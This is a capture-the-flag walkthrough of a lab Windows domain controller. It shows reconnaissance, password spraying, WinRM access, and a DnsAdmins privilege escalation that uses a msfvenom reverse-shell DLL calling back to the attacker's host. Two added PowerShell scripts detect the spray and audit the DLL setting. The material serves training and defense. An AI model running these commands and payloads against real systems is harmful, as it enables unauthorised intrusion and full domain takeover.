Difficulty: AVANZADO
Kali: 192.168.10.3
Target: 192.168.10.5
With the configuration supplied in the attachment the port scan did not work, because the DHCP server's IP was the same as the target's IP; changing the DHCP server address fixed it.
root@kali2 [/tmp] ➜ arp-scan -l [10:09:51]
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.10.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 0a:00:27:00:00:46 (Unknown: locally administered)
192.168.10.5 08:00:27:62:81:1d PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.213 seconds (115.68 hosts/sec). 2 responded
Port scan
root@kali2 [~] ➜ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.10.5 -oG ports.txt [11:01:27]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 11:01 CST
Nmap scan report for 192.168.10.5
Host is up (0.00027s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49673/tcp open unknown
49676/tcp open unknown
49686/tcp open unknown
MAC Address: 08:00:27:24:63:2C (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
root@kali2 [~] ➜ cat ports.txt | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',' [11:01:53]
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49673,49676,49686
root@kali2 [~] ➜ nmap -sV -A 192.168.10.5 -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49673,49676,49686 [11:02:00]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 11:02 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.10.5
Host is up (0.00017s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-12 10:02:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:24:63:2C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h39m56s, deviation: 34m37s, median: 6h59m55s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WIN-VRU3GG3DPLJ
| NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
| Domain name: DORAEMON.THL
| Forest name: DORAEMON.THL
| FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL
|_ System time: 2024-11-12T11:03:19+01:00
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:24:63:2c (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-12T10:03:19
|_ start_date: 2024-11-12T09:56:59
TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms 192.168.10.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.26 seconds
WinRM is running, and we also got a domain name; add DORAEMON.THL to /etc/hosts.
SMB enumeration
List the shares
root@kali2 [~] ➜ smbclient --no-pass -L //DORAEMON.THL [11:04:45]
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Admin remota
C$ Disk Recurso predeterminado
gorrocoptero Disk
IPC$ IPC IPC remota
NETLOGON Disk Recurso compartido del servidor de inicio de sesión
SYSVOL Disk Recurso compartido del servidor de inicio de sesión
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to DORAEMON.THL failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Quite a lot in there; let's look at the custom share gorrocoptero.
root@kali2 [~] ➜ smbclient //DORAEMON.THL/gorrocoptero --no-pass [11:08:26]
Try "help" to get a list of possible commands.
smb: \> ls
. DH 0 Wed Oct 2 17:17:24 2024
.. DH 0 Wed Oct 2 17:17:24 2024
kedadawapa.txt A 1843 Wed Oct 2 17:18:00 2024
7735807 blocks of size 4096. 4831151 blocks available
smb: \>
root@kali2 [~] ➜ cat kedadawapa.txt [11:09:06]
Atención al grupo especial Dorayaki1 de Estepona
- Doraemon: ¡Hola, chicos! ¿Qué les parece si vamos a comer dorayakis hoy?
- Nobita: ¡Sí! ¡Me encantan los dorayakis! Pero… ¿dónde vamos a conseguirlos?
- Shizuka: He oído que hay una nueva tienda de dorayakis en la esquina de la calle. ¡Dicen que son los mejores de la ciudad!
- Suneo: Oh, por favor. Siempre hay algo nuevo. No puedo esperar para probarlos. ¡Espero que sean más grandes que los de la tienda anterior!
- Gigante: ¡Quiero que sean enormes! ¡Y que tengan mucho relleno! Si no, ¡no me importa ir!
- Doraemon: Bueno, podemos pedirle a Nobita que use el poder de la máquina de tiempo para viajar al futuro y traernos unos dorayakis del año 3000.
- Nobita: ¡Espera! No sé si debería usar la máquina. La última vez que lo hice, terminé en un lugar lleno de robots raros…
- Shizuka: No te preocupes, Nobita. Solo vamos a la tienda. No necesitamos ir al futuro. ¡Podemos ir a pie!
- Suneo: Eso suena aburrido. ¿Por qué no hacemos una carrera? El primero en llegar a la tienda puede elegir el sabor de los dorayakis.
- Gigante: ¡Me encanta esa idea! Pero, ¡tendrás que correr rápido para ganarme, Suneo!
- Doraemon: ¿Y si mejor vamos todos juntos? Así disfrutamos del camino. Además, ¡puedo usar el futurófono para pedir un montón de dorayakis para que nos estén esperando!
- Nobita: ¡Esa es una gran idea, Doraemon! Así no tengo que correr y me aseguro de que haya suficiente para todos.
- Shizuka: ¡Perfecto! Entonces, ¡vamos a la tienda de dorayakis!
- Suneo: ¡Sí! ¡Dorayakis, allá vamos!
- Gigante: ¡No se olviden de mí! ¡Voy a ganar!
- Doraemon: ¡A comer dorayakis!
Even though it is all in Spanish, we still got some usernames and a group name, Dorayaki1.
root@kali2 [~] ➜ cat kedadawapa.txt | grep -oP "^- \K\w+" [11:11:55]
Doraemon
Nobita
Shizuka
Suneo
Gigante
Doraemon
Nobita
Shizuka
Suneo
Gigante
Doraemon
Nobita
Shizuka
Suneo
Gigante
Doraemon
With usernames in hand, first try AS-REP roasting.
root@kali2 [~] ➜ GetNPUsers.py -usersfile user.txt -no-pass -dc-ip 192.168.10.5 DORAEMON.THL/
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nobita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shizuka doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suneo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gigante doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nobita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shizuka doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suneo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gigante doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nobita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Shizuka doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Suneo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Gigante doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Doraemon doesn't have UF_DONT_REQUIRE_PREAUTH set
No luck.
Password brute-force
With no other information, try the group name as the password.
root@kali2 [~] ➜ crackmapexec smb 192.168.10.5 -u user.txt -p Dorayaki1 --continue-on-success [11:28:16]
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Suneo:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Suneo:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Suneo:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:Dorayaki1 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
Got a set of credentials, Doraemon:Dorayaki1; try logging in over WinRM.
WinRM login
root@kali2 [~] ➜ evil-winrm -i 192.168.10.5 -u Doraemon [11:28:18]
Enter Password:
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Doraemon\Documents> whoami
doraemon\doraemon
Login succeeded; gather information.
Surprisingly there is no user flag.
Directorio: C:\Users\Doraemon
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/16/2016 3:23 PM Desktop
d-r--- 10/1/2024 12:23 PM Documents
d-r--- 7/16/2016 3:23 PM Downloads
d-r--- 7/16/2016 3:23 PM Favorites
d-r--- 10/1/2024 12:32 PM Links
d-r--- 7/16/2016 3:23 PM Music
d-r--- 7/16/2016 3:23 PM Pictures
d----- 7/16/2016 3:23 PM Saved Games
d-r--- 7/16/2016 3:23 PM Videos
There is an unusual directory, Links.
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir -force
Directorio: C:\Users\Doraemon\Links
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 10/1/2024 12:35 PM 58 Carta de amor a Shizuka.txt
It contains a hidden file.
*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345
Got a new password; it looks like Doraemon's, but spray it across the user list anyway.
root@kali2 [~] ➜ crackmapexec smb 192.168.10.5 -u user.txt -p ShizukaTeAmobb12345 --continue-on-success [11:37:34]
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Nobita:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Shizuka:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Gigante:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
SMB 192.168.10.5 445 WIN-VRU3GG3DPLJ [-] DORAEMON.THL\Doraemon:ShizukaTeAmobb12345 STATUS_LOGON_FAILURE
It is actually Suneo's.
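Both crackmapexec runs above are password sprays: one source address, one password, every account in the list, seconds apart. As an added detection example (not from the original writeup), this PowerShell function finds that pattern in Security event 4625 data; the sample events are constructed to mirror the first run, and Get-FailedLogons shows where the live events would come from on the DC.

```powershell
# Added detection example (not part of the original writeup). A spray like the
# crackmapexec runs above shows up on the DC as failed logons (Security event 4625)
# from one source address against many distinct accounts within seconds.

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]]$Events,  # TimeCreated, TargetUserName, IpAddress
        [int]$WindowSeconds    = 60,
        [int]$MinDistinctUsers = 4
    )
    $alerts = @()
    foreach ($bySource in $Events | Group-Object IpAddress) {
        $sorted = @($bySource.Group | Sort-Object TimeCreated)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start  = $sorted[$i].TimeCreated
            $window = @($sorted | Where-Object {
                $_.TimeCreated -ge $start -and $_.TimeCreated -le $start.AddSeconds($WindowSeconds) })
            $users  = @($window | Select-Object -ExpandProperty TargetUserName | Sort-Object -Unique)
            if ($users.Count -ge $MinDistinctUsers) {
                $alerts += [PSCustomObject]@{
                    Source = $bySource.Name; Start = $start; Attempts = $window.Count; Users = ($users -join ',')
                }
                break   # one alert per source address is enough
            }
        }
    }
    return $alerts
}

function Get-FailedLogons {
    # Live version: in event 4625, property 5 is TargetUserName and property 19 is IpAddress.
    param([int]$Hours = 1)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            [PSCustomObject]@{
                TimeCreated    = $_.TimeCreated
                TargetUserName = $_.Properties[5].Value
                IpAddress      = $_.Properties[19].Value
            }
        }
}

# Constructed sample: the four accounts that failed in the first run above, one second
# apart, from the Kali box. Doraemon succeeded, so it produces a 4624 rather than a 4625,
# which is why the threshold counts distinct failed users, not accounts in the list.
$t0    = Get-Date '2024-11-12 11:28:16'
$names = 'Nobita', 'Shizuka', 'Suneo', 'Gigante'
$sample = @(for ($k = 0; $k -lt $names.Count; $k++) {
    [PSCustomObject]@{ TimeCreated = $t0.AddSeconds($k); TargetUserName = $names[$k]; IpAddress = '192.168.10.3' }
})
# A single mistyped password from another host must not alert.
$sample += [PSCustomObject]@{ TimeCreated = $t0.AddMinutes(5); TargetUserName = 'Nobita'; IpAddress = '192.168.10.20' }

Find-PasswordSpray -Events $sample | Format-Table -AutoSize
```

On the sample this reports one alert for 192.168.10.3 with four users and no alert for 192.168.10.20; on a live DC replace the sample with `Get-FailedLogons` output and lower the window for noisy environments.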
*Evil-WinRM* PS C:\Users\Suneo> cd Desktop
*Evil-WinRM* PS C:\Users\Suneo\Desktop> dir
Directorio: C:\Users\Suneo\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2024 11:19 AM 36 user.txt
*Evil-WinRM* PS C:\Users\Suneo\Desktop> type user.txt
**************
Got the user flag; on to privilege escalation.
DNSAdmins
*Evil-WinRM* PS C:\Users\Suneo\Desktop> whoami /all
INFORMACIÓN DE USUARIO
----------------------
Nombre de usuario SID
================= =============================================
doraemon\suneo S-1-5-21-3046175042-3013395696-775018414-1108
INFORMACIÓN DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
================================================================== ============== ============================================= =====================================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios de administración remota Alias S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Acceso compatible con versiones anteriores de Windows 2000 Alias S-1-5-32-554 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\NETWORK Grupo conocido S-1-5-2 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compañía Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
DORAEMON\DnsAdmins Grupo S-1-5-21-3046175042-3013395696-775018414-1101 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
DORAEMON\Dorayaki Alias S-1-5-21-3046175042-3013395696-775018414-1109 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado, Grupo local
NT AUTHORITY\Autenticación NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio alto Etiqueta S-1-16-8448
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
INFORMACIÓN DE NOTIFICACIONES DE USUARIO
-----------------------
Notificaciones de usuario desconocidas.
Se ha deshabilitado la compatibilidad de Kerberos para el control de acceso dinámico en este dispositivo.
Check for any unusual groups. After some searching, DnsAdmins turns out to be a privileged group: its members can make the DNS service load an arbitrary DLL, which then runs as SYSTEM.
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins
Generate a reverse-shell DLL.
root@kali2 [/tmp] ➜ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.3 LPORT=4567 -f dll -o exp.dll [11:48:06]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: exp.dll
Start an SMB share on Kali.
root@kali2 [/tmp] ➜ impacket-smbserver -smb2support "share" . [11:48:35]
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\Suneo\Desktop> dnscmd /config /serverlevelplugindll \\192.168.10.3\share\exp.dll
Propiedad del Registro serverlevelplugindll restablecida correctamente.
Comando completado correctamente.
Looks like the configuration succeeded; I can't read Spanish, but "correctamente" is clear enough. Now restart the DNS service.
*Evil-WinRM* PS C:\Users\Suneo\Desktop> sc.exe \\DORAEMON.THL stop dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x1
INDICACIÓN_INICIO : 0x7530
*Evil-WinRM* PS C:\Users\Suneo\Desktop> sc.exe \\DORAEMON.THL start dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x1
INDICACIÓN_INICIO : 0x4e20
PID : 2244
MARCAS :
root@kali2 [/tmp] ➜ nc -lnvp 4567 [11:51:13]
listening on [any] 4567 ...
connect to [192.168.10.3] from (UNKNOWN) [192.168.10.5] 49851
Microsoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
The shell came back on this side as well.
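The whole escalation above rests on one registry value and one service restart: dnscmd writes ServerLevelPluginDll under the DNS service's Parameters key, and the next DNS start loads that DLL as SYSTEM. As an added defensive audit (not from the original writeup), this PowerShell script reads that value, flags a UNC or non-System32 path like the one used above, lists who is in DnsAdmins, pulls recent DNS service stop/start events, and can clear the value. It assumes it runs on the DC as an administrator with the ActiveDirectory module installed; the registry path, the DNS service name and event 7036 are the standard ones.

```powershell
# Added audit (not part of the original writeup). Reads the ServerLevelPluginDll value
# that "dnscmd /config /serverlevelplugindll" writes; the DNS service loads that DLL as
# SYSTEM on its next start. Assumes: run on the DC as an administrator, with the
# ActiveDirectory module available for the group lookup.
$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDllFinding {
    param(
        [string]$RegistryPath = $DnsParams,
        [string]$GroupName = 'DnsAdmins'
    )
    $pluginDll = (Get-ItemProperty -Path $RegistryPath -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue).ServerLevelPluginDll

    $finding = [PSCustomObject]@{
        PluginDll        = $pluginDll
        IsSet            = -not [string]::IsNullOrEmpty($pluginDll)
        IsUncPath        = $false     # \\host\share\x.dll, exactly the shape used above
        OutsideSystem32  = $false
        DnsAdminsMembers = @()
        Severity         = 'OK'
    }
    if ($finding.IsSet) {
        $finding.IsUncPath       = $pluginDll -like '\\*'
        $finding.OutsideSystem32 = -not ($pluginDll -like "$env:SystemRoot\System32\*")
        $finding.Severity = if ($finding.IsUncPath -or $finding.OutsideSystem32) { 'CRITICAL' } else { 'REVIEW' }
    }
    try {
        # Everyone in this group can set the value and restart the service, so the
        # membership list is the second half of the finding.
        $finding.DnsAdminsMembers = @(Get-ADGroupMember -Identity $GroupName -Recursive -ErrorAction Stop |
                                      Select-Object -ExpandProperty SamAccountName)
    } catch {
        Write-Warning "Could not enumerate ${GroupName}: $($_.Exception.Message)"
    }
    return $finding
}

function Get-DnsServiceRestarts {
    # Service Control Manager event 7036 records every service stop/start; the DNS restart
    # is the trigger step of this technique. Property 0 is the localized display name
    # ("DNS Server", or "Servidor DNS" on the box above), property 1 the new state.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'
                                     Id = 7036; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[0].Value -match 'DNS' } |
        Select-Object TimeCreated, @{ n = 'Service'; e = { $_.Properties[0].Value } },
                                   @{ n = 'State';   e = { $_.Properties[1].Value } }
}

function Remove-DnsPluginDll {
    # Remediation: drop the value and restart DNS so the plugin is no longer loaded.
    param([string]$RegistryPath = $DnsParams)
    Remove-ItemProperty -Path $RegistryPath -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue
    Restart-Service -Name DNS
}

Get-DnsPluginDllFinding | Format-List
Get-DnsServiceRestarts  | Format-Table -AutoSize
```

On the machine in this writeup the finding would be CRITICAL (UNC path to the Kali share) with Suneo among the DnsAdmins members; keeping that group empty, or at least limited to accounts that are already domain admins, removes the escalation path entirely.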
C:\Users\Administrador\Desktop>dir
dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: 5E12-227F
Directorio de C:\Users\Administrador\Desktop
02/10/2024 10:19 <DIR> .
02/10/2024 10:19 <DIR> ..
02/10/2024 10:19 32 root.txt
1 archivos 32 bytes
2 dirs 19.864.584.192 bytes libres
C:\Users\Administrador\Desktop>type root.txt
type root.txt
************